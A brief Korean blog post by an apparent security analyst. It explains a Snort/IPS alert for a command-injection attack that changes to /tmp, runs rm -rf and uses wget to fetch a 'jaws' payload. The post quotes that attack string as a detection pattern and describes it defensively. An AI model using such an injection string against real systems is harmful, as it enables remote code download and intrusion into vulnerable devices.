22. 9. 5. 밤에 쓰는 이야기
최근 IPS에서 들어오는 취약점 공격으로
Snort 룰 : GET /shell cd/tmp rm -rf wget 0.0.0.0/jaws 공격이 많이 들어오고 있다.
해당 내용 분석결과 wget 커맨드 라인에 대한 공격으로
1. 시스템 명령어를 호출하는 어플리케이션의 인자 값을 조작하여 의도하지 않은 시스템 명령어를 실행시키는 공격 기법
2. 취약한 어플리케이션을 통하여 사용자의 명령어 시스템에서 임의적인 명령을 실행시키는 것을 목적으로 하는 공격
으로 설명이 될 수 있다.
tmp 파일은 임시 파일로 현재 위에 공격방법은 tmp 디렉토리에 접근하여 악성 스크립트를 삽입하려는 시도로 매우 강하게 보인다.
wget은 리눅스에서 파일을 다운받는 명령어로
wget [옵션]... [URL]...이렇게 사용이 가능하다.
0.0.0.0은 일반적으로 사용하는 IP는 아니며, IP를 모르는 경우 사용하여 모든 IP를 허용하거나, 차단할 수 있는 의미가 있다.
현재 Virustotal 등에서도 악의적인 행위로 간주하고 있다.
'IT 관련 > Security' 카테고리의 다른 글
| Splunk SIEM 명령어 정리 (0) | 2022.11.14 |
|---|